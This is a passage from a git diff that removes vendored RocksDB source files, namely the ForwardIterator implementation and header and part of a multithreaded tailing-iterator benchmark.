-      is_prev_set_ = false;
-    } else {
-      prev_key_.SetInternalKey(internal_key);
-      is_prev_set_ = true;
-      is_prev_inclusive_ = true;
-    }
-
-    TEST_SYNC_POINT_CALLBACK("ForwardIterator::SeekInternal:Immutable", this);
-  } else if (current_ && current_ != mutable_iter_) {
-    // current_ is one of immutable iterators, push it back to the heap
-    immutable_min_heap_.push(current_);
-  }
-
-  UpdateCurrent();
-  TEST_SYNC_POINT_CALLBACK("ForwardIterator::SeekInternal:Return", this);
-}
-
-void ForwardIterator::Next() {
-  assert(valid_);
-  bool update_prev_key = false;
-
-  if (sv_ == nullptr ||
-      sv_->version_number != cfd_->GetSuperVersionNumber()) {
-    std::string current_key = key().ToString();
-    Slice old_key(current_key.data(), current_key.size());
-
-    if (sv_ == nullptr) {
-      RebuildIterators(true);
-    } else {
-      RenewIterators();
-    }
-    SeekInternal(old_key, false);
-    if (!valid_ || key().compare(old_key) != 0) {
-      return;
-    }
-  } else if (current_ != mutable_iter_) {
-    // It is going to advance immutable iterator
-
-    if (is_prev_set_ && prefix_extractor_) {
-      // advance prev_key_ to current_ only if they share the same prefix
-      update_prev_key =
-          prefix_extractor_->Transform(prev_key_.GetUserKey())
-              .compare(prefix_extractor_->Transform(current_->key())) == 0;
-    } else {
-      update_prev_key = true;
-    }
-
-
-    if (update_prev_key) {
-      prev_key_.SetInternalKey(current_->key());
-      is_prev_set_ = true;
-      is_prev_inclusive_ = false;
-    }
-  }
-
-  current_->Next();
-  if (current_ != mutable_iter_) {
-    if (!current_->status().ok()) {
-      immutable_status_ = current_->status();
-    } else if ((current_->Valid()) && (!IsOverUpperBound(current_->key()))) {
-      immutable_min_heap_.push(current_);
-    } else {
-      if ((current_->Valid()) && (IsOverUpperBound(current_->key()))) {
-        // remove the current iterator
-        DeleteCurrentIter();
-        current_ = nullptr;
-      }
-      if (update_prev_key) {
-        mutable_iter_->Seek(prev_key_.GetInternalKey());
-      }
-    }
-  }
-  UpdateCurrent();
-  TEST_SYNC_POINT_CALLBACK("ForwardIterator::Next:Return", this);
-}
-
-Slice ForwardIterator::key() const {
-  assert(valid_);
-  return current_->key();
-}
-
-Slice ForwardIterator::value() const {
-  assert(valid_);
-  return current_->value();
-}
-
-Status ForwardIterator::status() const {
-  if (!status_.ok()) {
-    return status_;
-  } else if (!mutable_iter_->status().ok()) {
-    return mutable_iter_->status();
-  }
-
-  return immutable_status_;
-}
-
-Status ForwardIterator::GetProperty(std::string prop_name, std::string* prop) {
-  assert(prop != nullptr);
-  if (prop_name == "rocksdb.iterator.super-version-number") {
-    *prop = ToString(sv_->version_number);
-    return Status::OK();
-  }
-  return Status::InvalidArgument();
-}
-
-void ForwardIterator::SetPinnedItersMgr(
-    PinnedIteratorsManager* pinned_iters_mgr) {
-  pinned_iters_mgr_ = pinned_iters_mgr;
-  UpdateChildrenPinnedItersMgr();
-}
-
-void ForwardIterator::UpdateChildrenPinnedItersMgr() {
-  // Set PinnedIteratorsManager for mutable memtable iterator.
-  if (mutable_iter_) {
-    mutable_iter_->SetPinnedItersMgr(pinned_iters_mgr_);
-  }
-
-  // Set PinnedIteratorsManager for immutable memtable iterators.
-  for (InternalIterator* child_iter : imm_iters_) {
-    if (child_iter) {
-      child_iter->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-  }
-
-  // Set PinnedIteratorsManager for L0 files iterators.
-  for (InternalIterator* child_iter : l0_iters_) {
-    if (child_iter) {
-      child_iter->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-  }
-
-  // Set PinnedIteratorsManager for L1+ levels iterators.
-  for (LevelIterator* child_iter : level_iters_) {
-    if (child_iter) {
-      child_iter->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-  }
-}
-
-bool ForwardIterator::IsKeyPinned() const {
-  return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-         current_->IsKeyPinned();
-}
-
-bool ForwardIterator::IsValuePinned() const {
-  return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-         current_->IsValuePinned();
-}
-
-void ForwardIterator::RebuildIterators(bool refresh_sv) {
-  // Clean up
-  Cleanup(refresh_sv);
-  if (refresh_sv) {
-    // New
-    sv_ = cfd_->GetReferencedSuperVersion(&(db_->mutex_));
-  }
-  RangeDelAggregator range_del_agg(
-      InternalKeyComparator(cfd_->internal_comparator()), {} /* snapshots */);
-  mutable_iter_ = sv_->mem->NewIterator(read_options_, &arena_);
-  sv_->imm->AddIterators(read_options_, &imm_iters_, &arena_);
-  if (!read_options_.ignore_range_deletions) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        sv_->mem->NewRangeTombstoneIterator(read_options_));
-    range_del_agg.AddTombstones(std::move(range_del_iter));
-    sv_->imm->AddRangeTombstoneIterators(read_options_, &arena_,
-                                         &range_del_agg);
-  }
-  has_iter_trimmed_for_upper_bound_ = false;
-
-  const auto* vstorage = sv_->current->storage_info();
-  const auto& l0_files = vstorage->LevelFiles(0);
-  l0_iters_.reserve(l0_files.size());
-  for (const auto* l0 : l0_files) {
-    if ((read_options_.iterate_upper_bound != nullptr) &&
-        cfd_->internal_comparator().user_comparator()->Compare(
-            l0->smallest.user_key(), *read_options_.iterate_upper_bound) > 0) {
-      has_iter_trimmed_for_upper_bound_ = true;
-      l0_iters_.push_back(nullptr);
-      continue;
-    }
-    l0_iters_.push_back(cfd_->table_cache()->NewIterator(
-        read_options_, *cfd_->soptions(), cfd_->internal_comparator(), l0->fd,
-        read_options_.ignore_range_deletions ? nullptr : &range_del_agg));
-  }
-  BuildLevelIterators(vstorage);
-  current_ = nullptr;
-  is_prev_set_ = false;
-
-  UpdateChildrenPinnedItersMgr();
-  if (!range_del_agg.IsEmpty()) {
-    status_ = Status::NotSupported(
-        "Range tombstones unsupported with ForwardIterator");
-    valid_ = false;
-  }
-}
-
-void ForwardIterator::RenewIterators() {
-  SuperVersion* svnew;
-  assert(sv_);
-  svnew = cfd_->GetReferencedSuperVersion(&(db_->mutex_));
-
-  if (mutable_iter_ != nullptr) {
-    DeleteIterator(mutable_iter_, true /* is_arena */);
-  }
-  for (auto* m : imm_iters_) {
-    DeleteIterator(m, true /* is_arena */);
-  }
-  imm_iters_.clear();
-
-  mutable_iter_ = svnew->mem->NewIterator(read_options_, &arena_);
-  svnew->imm->AddIterators(read_options_, &imm_iters_, &arena_);
-  RangeDelAggregator range_del_agg(
-      InternalKeyComparator(cfd_->internal_comparator()), {} /* snapshots */);
-  if (!read_options_.ignore_range_deletions) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        svnew->mem->NewRangeTombstoneIterator(read_options_));
-    range_del_agg.AddTombstones(std::move(range_del_iter));
-    sv_->imm->AddRangeTombstoneIterators(read_options_, &arena_,
-                                         &range_del_agg);
-  }
-
-  const auto* vstorage = sv_->current->storage_info();
-  const auto& l0_files = vstorage->LevelFiles(0);
-  const auto* vstorage_new = svnew->current->storage_info();
-  const auto& l0_files_new = vstorage_new->LevelFiles(0);
-  size_t iold, inew;
-  bool found;
-  std::vector<InternalIterator*> l0_iters_new;
-  l0_iters_new.reserve(l0_files_new.size());
-
-  for (inew = 0; inew < l0_files_new.size(); inew++) {
-    found = false;
-    for (iold = 0; iold < l0_files.size(); iold++) {
-      if (l0_files[iold] == l0_files_new[inew]) {
-        found = true;
-        break;
-      }
-    }
-    if (found) {
-      if (l0_iters_[iold] == nullptr) {
-        l0_iters_new.push_back(nullptr);
-        TEST_SYNC_POINT_CALLBACK("ForwardIterator::RenewIterators:Null", this);
-      } else {
-        l0_iters_new.push_back(l0_iters_[iold]);
-        l0_iters_[iold] = nullptr;
-        TEST_SYNC_POINT_CALLBACK("ForwardIterator::RenewIterators:Copy", this);
-      }
-      continue;
-    }
-    l0_iters_new.push_back(cfd_->table_cache()->NewIterator(
-        read_options_, *cfd_->soptions(), cfd_->internal_comparator(),
-        l0_files_new[inew]->fd,
-        read_options_.ignore_range_deletions ? nullptr : &range_del_agg));
-  }
-
-  for (auto* f : l0_iters_) {
-    DeleteIterator(f);
-  }
-  l0_iters_.clear();
-  l0_iters_ = l0_iters_new;
-
-  for (auto* l : level_iters_) {
-    DeleteIterator(l);
-  }
-  level_iters_.clear();
-  BuildLevelIterators(vstorage_new);
-  current_ = nullptr;
-  is_prev_set_ = false;
-  SVCleanup();
-  sv_ = svnew;
-
-  UpdateChildrenPinnedItersMgr();
-  if (!range_del_agg.IsEmpty()) {
-    status_ = Status::NotSupported(
-        "Range tombstones unsupported with ForwardIterator");
-    valid_ = false;
-  }
-}
-
-void ForwardIterator::BuildLevelIterators(const VersionStorageInfo* vstorage) {
-  level_iters_.reserve(vstorage->num_levels() - 1);
-  for (int32_t level = 1; level < vstorage->num_levels(); ++level) {
-    const auto& level_files = vstorage->LevelFiles(level);
-    if ((level_files.empty()) ||
-        ((read_options_.iterate_upper_bound != nullptr) &&
-         (user_comparator_->Compare(*read_options_.iterate_upper_bound,
-                                    level_files[0]->smallest.user_key()) <
-          0))) {
-      level_iters_.push_back(nullptr);
-      if (!level_files.empty()) {
-        has_iter_trimmed_for_upper_bound_ = true;
-      }
-    } else {
-      level_iters_.push_back(
-          new LevelIterator(cfd_, read_options_, level_files));
-    }
-  }
-}
-
-void ForwardIterator::ResetIncompleteIterators() {
-  const auto& l0_files = sv_->current->storage_info()->LevelFiles(0);
-  for (size_t i = 0; i < l0_iters_.size(); ++i) {
-    assert(i < l0_files.size());
-    if (!l0_iters_[i] || !l0_iters_[i]->status().IsIncomplete()) {
-      continue;
-    }
-    DeleteIterator(l0_iters_[i]);
-    l0_iters_[i] = cfd_->table_cache()->NewIterator(
-        read_options_, *cfd_->soptions(), cfd_->internal_comparator(),
-        l0_files[i]->fd, nullptr /* range_del_agg */);
-    l0_iters_[i]->SetPinnedItersMgr(pinned_iters_mgr_);
-  }
-
-  for (auto* level_iter : level_iters_) {
-    if (level_iter && level_iter->status().IsIncomplete()) {
-      level_iter->Reset();
-    }
-  }
-
-  current_ = nullptr;
-  is_prev_set_ = false;
-}
-
-void ForwardIterator::UpdateCurrent() {
-  if (immutable_min_heap_.empty() && !mutable_iter_->Valid()) {
-    current_ = nullptr;
-  } else if (immutable_min_heap_.empty()) {
-    current_ = mutable_iter_;
-  } else if (!mutable_iter_->Valid()) {
-    current_ = immutable_min_heap_.top();
-    immutable_min_heap_.pop();
-  } else {
-    current_ = immutable_min_heap_.top();
-    assert(current_ != nullptr);
-    assert(current_->Valid());
-    int cmp = cfd_->internal_comparator().InternalKeyComparator::Compare(
-        mutable_iter_->key(), current_->key());
-    assert(cmp != 0);
-    if (cmp > 0) {
-      immutable_min_heap_.pop();
-    } else {
-      current_ = mutable_iter_;
-    }
-  }
-  valid_ = (current_ != nullptr);
-  if (!status_.ok()) {
-    status_ = Status::OK();
-  }
-
-  // Upper bound doesn't apply to the memtable iterator. We want Valid() to
-  // return false when all iterators are over iterate_upper_bound, but can't
-  // just set valid_ to false, as that would effectively disable the tailing
-  // optimization (Seek() would be called on all immutable iterators regardless
-  // of whether the target key is greater than prev_key_).
-  current_over_upper_bound_ = valid_ && IsOverUpperBound(current_->key());
-}
-
-bool ForwardIterator::NeedToSeekImmutable(const Slice& target) {
-  // We maintain the interval (prev_key_, immutable_min_heap_.top()->key())
-  // such that there are no records with keys within that range in
-  // immutable_min_heap_. Since immutable structures (SST files and immutable
-  // memtables) can't change in this version, we don't need to do a seek if
-  // 'target' belongs to that interval (immutable_min_heap_.top() is already
-  // at the correct position).
-
-  if (!valid_ || !current_ || !is_prev_set_ || !immutable_status_.ok()) {
-    return true;
-  }
-  Slice prev_key = prev_key_.GetInternalKey();
-  if (prefix_extractor_ && prefix_extractor_->Transform(target).compare(
-    prefix_extractor_->Transform(prev_key)) != 0) {
-    return true;
-  }
-  if (cfd_->internal_comparator().InternalKeyComparator::Compare(
-        prev_key, target) >= (is_prev_inclusive_ ? 1 : 0)) {
-    return true;
-  }
-
-  if (immutable_min_heap_.empty() && current_ == mutable_iter_) {
-    // Nothing to seek on.
-    return false;
-  }
-  if (cfd_->internal_comparator().InternalKeyComparator::Compare(
-        target, current_ == mutable_iter_ ? immutable_min_heap_.top()->key()
-                                          : current_->key()) > 0) {
-    return true;
-  }
-  return false;
-}
-
-void ForwardIterator::DeleteCurrentIter() {
-  const VersionStorageInfo* vstorage = sv_->current->storage_info();
-  const std::vector<FileMetaData*>& l0 = vstorage->LevelFiles(0);
-  for (size_t i = 0; i < l0.size(); ++i) {
-    if (!l0_iters_[i]) {
-      continue;
-    }
-    if (l0_iters_[i] == current_) {
-      has_iter_trimmed_for_upper_bound_ = true;
-      DeleteIterator(l0_iters_[i]);
-      l0_iters_[i] = nullptr;
-      return;
-    }
-  }
-
-  for (int32_t level = 1; level < vstorage->num_levels(); ++level) {
-    if (level_iters_[level - 1] == nullptr) {
-      continue;
-    }
-    if (level_iters_[level - 1] == current_) {
-      has_iter_trimmed_for_upper_bound_ = true;
-      DeleteIterator(level_iters_[level - 1]);
-      level_iters_[level - 1] = nullptr;
-    }
-  }
-}
-
-bool ForwardIterator::TEST_CheckDeletedIters(int* pdeleted_iters,
-                                             int* pnum_iters) {
-  bool retval = false;
-  int deleted_iters = 0;
-  int num_iters = 0;
-
-  const VersionStorageInfo* vstorage = sv_->current->storage_info();
-  const std::vector<FileMetaData*>& l0 = vstorage->LevelFiles(0);
-  for (size_t i = 0; i < l0.size(); ++i) {
-    if (!l0_iters_[i]) {
-      retval = true;
-      deleted_iters++;
-    } else {
-      num_iters++;
-    }
-  }
-
-  for (int32_t level = 1; level < vstorage->num_levels(); ++level) {
-    if ((level_iters_[level - 1] == nullptr) &&
-        (!vstorage->LevelFiles(level).empty())) {
-      retval = true;
-      deleted_iters++;
-    } else if (!vstorage->LevelFiles(level).empty()) {
-      num_iters++;
-    }
-  }
-  if ((!retval) && num_iters <= 1) {
-    retval = true;
-  }
-  if (pdeleted_iters) {
-    *pdeleted_iters = deleted_iters;
-  }
-  if (pnum_iters) {
-    *pnum_iters = num_iters;
-  }
-  return retval;
-}
-
-uint32_t ForwardIterator::FindFileInRange(
-    const std::vector<FileMetaData*>& files, const Slice& internal_key,
-    uint32_t left, uint32_t right) {
-  while (left < right) {
-    uint32_t mid = (left + right) / 2;
-    const FileMetaData* f = files[mid];
-    if (cfd_->internal_comparator().InternalKeyComparator::Compare(
-          f->largest.Encode(), internal_key) < 0) {
-      // Key at "mid.largest" is < "target".  Therefore all
-      // files at or before "mid" are uninteresting.
-      left = mid + 1;
-    } else {
-      // Key at "mid.largest" is >= "target".  Therefore all files
-      // after "mid" are uninteresting.
-      right = mid;
-    }
-  }
-  return right;
-}
-
-void ForwardIterator::DeleteIterator(InternalIterator* iter, bool is_arena) {
-  if (iter == nullptr) {
-    return;
-  }
-
-  if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-    pinned_iters_mgr_->PinIterator(iter, is_arena);
-  } else {
-    if (is_arena) {
-      iter->~InternalIterator();
-    } else {
-      delete iter;
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/forward_iterator.h b/thirdparty/rocksdb/db/forward_iterator.h
deleted file mode 100644
index d4f32cb..0000000
--- a/thirdparty/rocksdb/db/forward_iterator.h
+++ /dev/null
@@ -1,153 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-#include <queue>
-
-#include "rocksdb/db.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "db/dbformat.h"
-#include "table/internal_iterator.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-class DBImpl;
-class Env;
-struct SuperVersion;
-class ColumnFamilyData;
-class LevelIterator;
-class VersionStorageInfo;
-struct FileMetaData;
-
-class MinIterComparator {
- public:
-  explicit MinIterComparator(const Comparator* comparator) :
-    comparator_(comparator) {}
-
-  bool operator()(InternalIterator* a, InternalIterator* b) {
-    return comparator_->Compare(a->key(), b->key()) > 0;
-  }
- private:
-  const Comparator* comparator_;
-};
-
-typedef std::priority_queue<InternalIterator*, std::vector<InternalIterator*>,
-                            MinIterComparator> MinIterHeap;
-
-/**
- * ForwardIterator is a special type of iterator that only supports Seek()
- * and Next(). It is expected to perform better than TailingIterator by
- * removing the encapsulation and making all information accessible within
- * the iterator. At the current implementation, snapshot is taken at the
- * time Seek() is called. The Next() followed do not see new values after.
- */
-class ForwardIterator : public InternalIterator {
- public:
-  ForwardIterator(DBImpl* db, const ReadOptions& read_options,
-                  ColumnFamilyData* cfd, SuperVersion* current_sv = nullptr);
-  virtual ~ForwardIterator();
-
-  void SeekForPrev(const Slice& target) override {
-    status_ = Status::NotSupported("ForwardIterator::SeekForPrev()");
-    valid_ = false;
-  }
-  void SeekToLast() override {
-    status_ = Status::NotSupported("ForwardIterator::SeekToLast()");
-    valid_ = false;
-  }
-  void Prev() override {
-    status_ = Status::NotSupported("ForwardIterator::Prev");
-    valid_ = false;
-  }
-
-  virtual bool Valid() const override;
-  void SeekToFirst() override;
-  virtual void Seek(const Slice& target) override;
-  virtual void Next() override;
-  virtual Slice key() const override;
-  virtual Slice value() const override;
-  virtual Status status() const override;
-  virtual Status GetProperty(std::string prop_name, std::string* prop) override;
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override;
-  virtual bool IsKeyPinned() const override;
-  virtual bool IsValuePinned() const override;
-
-  bool TEST_CheckDeletedIters(int* deleted_iters, int* num_iters);
-
- private:
-  void Cleanup(bool release_sv);
-  void SVCleanup();
-  void RebuildIterators(bool refresh_sv);
-  void RenewIterators();
-  void BuildLevelIterators(const VersionStorageInfo* vstorage);
-  void ResetIncompleteIterators();
-  void SeekInternal(const Slice& internal_key, bool seek_to_first);
-  void UpdateCurrent();
-  bool NeedToSeekImmutable(const Slice& internal_key);
-  void DeleteCurrentIter();
-  uint32_t FindFileInRange(
-    const std::vector<FileMetaData*>& files, const Slice& internal_key,
-    uint32_t left, uint32_t right);
-
-  bool IsOverUpperBound(const Slice& internal_key) const;
-
-  // Set PinnedIteratorsManager for all children Iterators, this function should
-  // be called whenever we update children Iterators or pinned_iters_mgr_.
-  void UpdateChildrenPinnedItersMgr();
-
-  // A helper function that will release iter in the proper manner, or pass it
-  // to pinned_iters_mgr_ to release it later if pinning is enabled.
-  void DeleteIterator(InternalIterator* iter, bool is_arena = false);
-
-  DBImpl* const db_;
-  const ReadOptions read_options_;
-  ColumnFamilyData* const cfd_;
-  const SliceTransform* const prefix_extractor_;
-  const Comparator* user_comparator_;
-  MinIterHeap immutable_min_heap_;
-
-  SuperVersion* sv_;
-  InternalIterator* mutable_iter_;
-  std::vector<InternalIterator*> imm_iters_;
-  std::vector<InternalIterator*> l0_iters_;
-  std::vector<LevelIterator*> level_iters_;
-  InternalIterator* current_;
-  bool valid_;
-
-  // Internal iterator status; set only by one of the unsupported methods.
-  Status status_;
-  // Status of immutable iterators, maintained here to avoid iterating over
-  // all of them in status().
-  Status immutable_status_;
-  // Indicates that at least one of the immutable iterators pointed to a key
-  // larger than iterate_upper_bound and was therefore destroyed. Seek() may
-  // need to rebuild such iterators.
-  bool has_iter_trimmed_for_upper_bound_;
-  // Is current key larger than iterate_upper_bound? If so, makes Valid()
-  // return false.
-  bool current_over_upper_bound_;
-
-  // Left endpoint of the range of keys that immutable iterators currently
-  // cover. When Seek() is called with a key that's within that range, immutable
-  // iterators don't need to be moved; see NeedToSeekImmutable(). This key is
-  // included in the range after a Seek(), but excluded when advancing the
-  // iterator using Next().
-  IterKey prev_key_;
-  bool is_prev_set_;
-  bool is_prev_inclusive_;
-
-  PinnedIteratorsManager* pinned_iters_mgr_;
-  Arena arena_;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/forward_iterator_bench.cc b/thirdparty/rocksdb/db/forward_iterator_bench.cc
deleted file mode 100644
index e9ae770..0000000
--- a/thirdparty/rocksdb/db/forward_iterator_bench.cc
+++ /dev/null
@@ -1,375 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#if !defined(GFLAGS) || defined(ROCKSDB_LITE)
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#elif defined(OS_MACOSX) || defined(OS_WIN)
-// Block forward_iterator_bench under MAC and Windows
-int main() { return 0; }
-#else
-#include <gflags/gflags.h>
-#include <semaphore.h>
-#include <atomic>
-#include <bitset>
-#include <chrono>
-#include <climits>
-#include <condition_variable>
-#include <limits>
-#include <mutex>
-#include <queue>
-#include <random>
-#include <thread>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "port/port.h"
-#include "util/testharness.h"
-
-const int MAX_SHARDS = 100000;
-
-DEFINE_int32(writers, 8, "");
-DEFINE_int32(readers, 8, "");
-DEFINE_int64(rate, 100000, "");
-DEFINE_int64(value_size, 300, "");
-DEFINE_int64(shards, 1000, "");
-DEFINE_int64(memtable_size, 500000000, "");
-DEFINE_int64(block_cache_size, 300000000, "");
-DEFINE_int64(block_size, 65536, "");
-DEFINE_double(runtime, 300.0, "");
-DEFINE_bool(cache_only_first, true, "");
-DEFINE_bool(iterate_upper_bound, true, "");
-
-struct Stats {
-  char pad1[128] __attribute__((__unused__));
-  std::atomic<uint64_t> written{0};
-  char pad2[128] __attribute__((__unused__));
-  std::atomic<uint64_t> read{0};
-  std::atomic<uint64_t> cache_misses{0};
-  char pad3[128] __attribute__((__unused__));
-} stats;
-
-struct Key {
-  Key() {}
-  Key(uint64_t shard_in, uint64_t seqno_in)
-      : shard_be(htobe64(shard_in)), seqno_be(htobe64(seqno_in)) {}
-
-  uint64_t shard() const { return be64toh(shard_be); }
-  uint64_t seqno() const { return be64toh(seqno_be); }
-
- private:
-  uint64_t shard_be;
-  uint64_t seqno_be;
-} __attribute__((__packed__));
-
-struct Reader;
-struct Writer;
-
-struct ShardState {
-  char pad1[128] __attribute__((__unused__));
-  std::atomic<uint64_t> last_written{0};
-  Writer* writer;
-  Reader* reader;
-  char pad2[128] __attribute__((__unused__));
-  std::atomic<uint64_t> last_read{0};
-  std::unique_ptr<rocksdb::Iterator> it;
-  std::unique_ptr<rocksdb::Iterator> it_cacheonly;
-  Key upper_bound;
-  rocksdb::Slice upper_bound_slice;
-  char pad3[128] __attribute__((__unused__));
-};
-
-struct Reader {
- public:
-  explicit Reader(std::vector<ShardState>* shard_states, rocksdb::DB* db)
-      : shard_states_(shard_states), db_(db) {
-    sem_init(&sem_, 0, 0);
-    thread_ = port::Thread(&Reader::run, this);
-  }
-
-  void run() {
-    while (1) {
-      sem_wait(&sem_);
-      if (done_.load()) {
-        break;
-      }
-
-      uint64_t shard;
-      {
-        std::lock_guard<std::mutex> guard(queue_mutex_);
-        assert(!shards_pending_queue_.empty());
-        shard = shards_pending_queue_.front();
-        shards_pending_queue_.pop();
-        shards_pending_set_.reset(shard);
-      }
-      readOnceFromShard(shard);
-    }
-  }
-
-  void readOnceFromShard(uint64_t shard) {
-    ShardState& state = (*shard_states_)[shard];
-    if (!state.it) {
-      // Initialize iterators
-      rocksdb::ReadOptions options;
-      options.tailing = true;
-      if (FLAGS_iterate_upper_bound) {
-        state.upper_bound = Key(shard, std::numeric_limits<uint64_t>::max());
-        state.upper_bound_slice = rocksdb::Slice(
-            (const char*)&state.upper_bound, sizeof(state.upper_bound));
-        options.iterate_upper_bound = &state.upper_bound_slice;
-      }
-
-      state.it.reset(db_->NewIterator(options));
-
-      if (FLAGS_cache_only_first) {
-        options.read_tier = rocksdb::ReadTier::kBlockCacheTier;
-        state.it_cacheonly.reset(db_->NewIterator(options));
-      }
-    }
-
-    const uint64_t upto = state.last_written.load();
-    for (rocksdb::Iterator* it : {state.it_cacheonly.get(), state.it.get()}) {
-      if (it == nullptr) {
-        continue;
-      }
-      if (state.last_read.load() >= upto) {
-        break;
-      }
-      bool need_seek = true;
-      for (uint64_t seq = state.last_read.load() + 1; seq <= upto; ++seq) {
-        if (need_seek) {
-          Key from(shard, state.last_read.load() + 1);
-          it->Seek(rocksdb::Slice((const char*)&from, sizeof(from)));
-          need_seek = false;
-        } else {
-          it->Next();
-        }
-        if (it->status().IsIncomplete()) {
-          ++::stats.cache_misses;
-          break;
-        }
-        assert(it->Valid());
-        assert(it->key().size() == sizeof(Key));
-        Key key;
-        memcpy(&key, it->key().data(), it->key().size());
-        // fprintf(stderr, "Expecting (%ld, %ld) read (%ld, %ld)\n",
-        //         shard, seq, key.shard(), key.seqno());
-        assert(key.shard() == shard);
-        assert(key.seqno() == seq);
-        state.last_read.store(seq);
-        ++::stats.read;
-      }
-    }
-  }
-
-  void onWrite(uint64_t shard) {
-    {
-      std::lock_guard<std::mutex> guard(queue_mutex_);
-      if (!shards_pending_set_.test(shard)) {
-        shards_pending_queue_.push(shard);
-        shards_pending_set_.set(shard);
-        sem_post(&sem_);
-      }
-    }
-  }
-
-  ~Reader() {
-    done_.store(true);
-    sem_post(&sem_);
-    thread_.join();
-  }
-
- private:
-  char pad1[128] __attribute__((__unused__));
-  std::vector<ShardState>* shard_states_;
-  rocksdb::DB* db_;
-  rocksdb::port::Thread thread_;
-  sem_t sem_;
-  std::mutex queue_mutex_;
-  std::bitset<MAX_SHARDS + 1> shards_pending_set_;
-  std::queue<uint64_t> shards_pending_queue_;
-  std::atomic<bool> done_{false};
-  char pad2[128] __attribute__((__unused__));
-};
-
-struct Writer {
-  explicit Writer(std::vector<ShardState>* shard_states, rocksdb::DB* db)
-      : shard_states_(shard_states), db_(db) {}
-
-  void start() { thread_ = port::Thread(&Writer::run, this); }
-
-  void run() {
-    std::queue<std::chrono::steady_clock::time_point> workq;
-    std::chrono::steady_clock::time_point deadline(
-        std::chrono::steady_clock::now() +
-        std::chrono::nanoseconds((uint64_t)(1000000000 * FLAGS_runtime)));
-    std::vector<uint64_t> my_shards;
-    for (int i = 1; i <= FLAGS_shards; ++i) {
-      if ((*shard_states_)[i].writer == this) {
-        my_shards.push_back(i);
-      }
-    }
-
-    std::mt19937 rng{std::random_device()()};
-    std::uniform_int_distribution<int> shard_dist(
-        0, static_cast<int>(my_shards.size()) - 1);
-    std::string value(FLAGS_value_size, '*');
-
-    while (1) {
-      auto now = std::chrono::steady_clock::now();
-      if (FLAGS_runtime >= 0 && now >= deadline) {
-        break;
-      }
-      if (workq.empty()) {
-        for (int i = 0; i < FLAGS_rate; i += FLAGS_writers) {
-          std::chrono::nanoseconds offset(1000000000LL * i / FLAGS_rate);
-          workq.push(now + offset);
-        }
-      }
-      while (!workq.empty() && workq.front() < now) {
-        workq.pop();
-        uint64_t shard = my_shards[shard_dist(rng)];
-        ShardState& state = (*shard_states_)[shard];
-        uint64_t seqno = state.last_written.load() + 1;
-        Key key(shard, seqno);
-        // fprintf(stderr, "Writing (%ld, %ld)\n", shard, seqno);
-        rocksdb::Status status =
-            db_->Put(rocksdb::WriteOptions(),
-                     rocksdb::Slice((const char*)&key, sizeof(key)),
-                     rocksdb::Slice(value));
-        assert(status.ok());
-        state.last_written.store(seqno);
-        state.reader->onWrite(shard);
-        ++::stats.written;
-      }
-      std::this_thread::sleep_for(std::chrono::milliseconds(1));
-    }
-    // fprintf(stderr, "Writer done\n");
-  }
-
-  ~Writer() { thread_.join(); }
-
- private:
-  char pad1[128] __attribute__((__unused__));
-  std::vector<ShardState>* shard_states_;
-  rocksdb::DB* db_;
-  rocksdb::port::Thread thread_;
-  char pad2[128] __attribute__((__unused__));
-};
-
-struct StatsThread {
-  explicit StatsThread(rocksdb::DB* db)
-      : db_(db), thread_(&StatsThread::run, this) {}
-
-  void run() {
-    //    using namespace std::chrono;
-    auto tstart = std::chrono::steady_clock::now(), tlast = tstart;
-    uint64_t wlast = 0, rlast = 0;
-    while (!done_.load()) {
-      {
-        std::unique_lock<std::mutex> lock(cvm_);
-        cv_.wait_for(lock, std::chrono::seconds(1));
-      }
-      auto now = std::chrono::steady_clock::now();
-      double elapsed =
-          std::chrono::duration_cast<std::chrono::duration<double> >(
-              now - tlast).count();
-      uint64_t w = ::stats.written.load();
-      uint64_t r = ::stats.read.load();
-      fprintf(stderr,
-              "%s elapsed %4lds | written %10ld | w/s %10.0f | read %10ld | "
-              "r/s %10.0f | cache misses %10ld\n",
-              db_->GetEnv()->TimeToString(time(nullptr)).c_str(),
-              std::chrono::duration_cast<std::chrono::seconds>(now - tstart)
-                  .count(),
-              w, (w - wlast) / elapsed, r, (r - rlast) / elapsed,
-              ::stats.cache_misses.load());
-      wlast = w;
-      rlast = r;
-      tlast = now;
-    }
-  }
-
-  ~StatsThread() {
-    {
-      std::lock_guard<std::mutex> guard(cvm_);
-      done_.store(true);
-    }
-    cv_.notify_all();
-    thread_.join();
-  }
-
- private:
-  rocksdb::DB* db_;
-  std::mutex cvm_;
-  std::condition_variable cv_;
-  rocksdb::port::Thread thread_;
-  std::atomic<bool> done_{false};
-};
-
-int main(int argc, char** argv) {
-  GFLAGS::ParseCommandLineFlags(&argc, &argv, true);
-
-  std::mt19937 rng{std::random_device()()};
-  rocksdb::Status status;
